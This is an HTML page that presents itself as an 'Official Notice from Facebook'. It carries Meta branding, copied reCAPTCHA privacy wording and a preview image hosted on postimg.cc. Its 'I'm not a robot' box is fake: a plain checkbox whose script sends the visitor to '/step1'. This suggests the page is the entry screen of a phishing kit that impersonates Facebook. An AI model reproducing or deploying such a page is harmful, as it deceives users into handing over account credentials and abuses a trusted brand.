<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Official Notice from Facebook</title>
    <meta name="description" content="Read this Business Help Center article to learn more about the types of content that violate Facebook's Community Standards.">
    <meta name="robots" content="index, follow">
    <meta property="og:title" content="Official Notice from Facebook">
    <meta property="og:description" content="Read this Business Help Center article to learn more about the types of content that violate Facebook's Community Standards.">
    <meta property="og:image" content="https://i.postimg.cc/Y2dN0B2t/social-preview.png">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="Official Notice from Facebook">
    <meta name="twitter:description" content="Read this Business Help Center article to learn more about the types of content that violate Facebook's Community Standards.">
    <meta name="twitter:image" content="https://i.postimg.cc/Y2dN0B2t/social-preview.png">
    <link rel="shortcut icon" href="/favicon-32x32.png">
    <link rel="icon" href="/assets/img/logo-meta.svg" sizes="256x256" type="image/x-icon">
    <link rel="apple-touch-icon" href="/favicon-32x32.png">
    <link rel="stylesheet" href="assets/css/recaptcha.css" data-precedence="next">
</head>

<body class="optimisticfont_4ac3b110-module__1kobXa__variable antialiased">
    <div style="visibility: visible;" bis_skin_checked="1">
        <div class="bg-[#ffffff] flex flex-col items-center justify-start h-screen w-full" bis_skin_checked="1">
            <div class="font-roboto text-[14px] text-gray-800 w-full h-full flex flex-col justify-center p-4 md:p-0 md:w-[300px]" bis_skin_checked="1">
                <div class="w-full" bis_skin_checked="1">
                    <img alt="Meta Logo" loading="lazy" width="64" height="64" decoding="async" data-nimg="1" class="w-[64px]" style="color:transparent" src="assets/img/meta.svg">
                </div>
                <div class="flex items-center justify-start bg-cover bg-center py-5 w-full font-helvetica" bis_skin_checked="1">
                    <div class="bg-[#f9f9f9] border-2 rounded-md text-[#efe9e9] flex flex-row items-center justify-between pr-2 w-full" bis_skin_checked="1">
                        <div class="flex flex-row items-center justify-start ml-[1rem]" bis_skin_checked="1">
                            <div class="relative w-[30px] h-[30px] flex items-center justify-center" bis_skin_checked="1">
                                <label class="checkbox path flex items-center justify-center">
                                    <input type="checkbox" id="checked-capcha">
                                    <svg viewBox="0 0 21 21">
                                        <path d="M5,10.75 L8.5,14.25 L19.4,2.3 C18.8333333,1.43333333 18.0333333,1 17,1 L4,1 C2.35,1 1,2.35 1,4 L1,17 C1,18.65 2.35,20 4,20 L17,20 C18.65,20 20,18.65 20,17 L20,7.99769186"></path>
                                    </svg>
                                </label>
                            </div>
                            <label for="checked-capcha" class="cursor-pointer text-[14px] text-gray-500 font-semibold mr-4 ml-1 text-center text-left tracking-normal">I'm not a robot</label>
                        </div>
                        <div class="flex items-center flex-col text-[#9d9ba7] mb-[2px]" bis_skin_checked="1">
                            <img alt="reCAPTCHA" loading="lazy" width="40" height="40" decoding="async" data-nimg="1" class="w-[40px] h-[40px] mt-[.5rem]" style="color:transparent" src="assets/img/recaptcha.webp">
                            <span class="text-[10px] font-bold">reCAPTCHA</span>
                            <div class="text-[8px]" bis_skin_checked="1">Privacy - Terms</div>
                        </div>
                    </div>
                </div>
                <div class="text-gray-700 font-helvetica text-[13px] leading-[1.3]" bis_skin_checked="1">
                    <p class="font-normal">This helps us to combat harmful conduct, detect and prevent spam and maintain the integrity of our Products.</p>
                    <p class="font-normal mt-4">We've used Google's reCAPTCHA Enterprise product to provide this security check. Your use of reCAPTCHA Enterprise is subject to Google's Privacy Policy and Terms of Use.</p>
                    <p class="font-normal mt-4">reCAPTCHA Enterprise collects hardware and software information, such as device and application data, and sends it to Google to provide, maintain, and improve reCAPTCHA Enterprise and for general security purposes. This information is not used by Google for personalized advertising.</p>
                </div>
            </div>
        </div>
        <!--$-->
        <!--/$-->
    </div>
    

<script>
document.addEventListener('DOMContentLoaded', function() {
    const checkbox = document.getElementById('checked-capcha');
    checkbox.addEventListener('change', function() {
        if (this.checked) {
            window.location.href = '/step1';
        }
    });
});
</script>

   
</body>

</html>
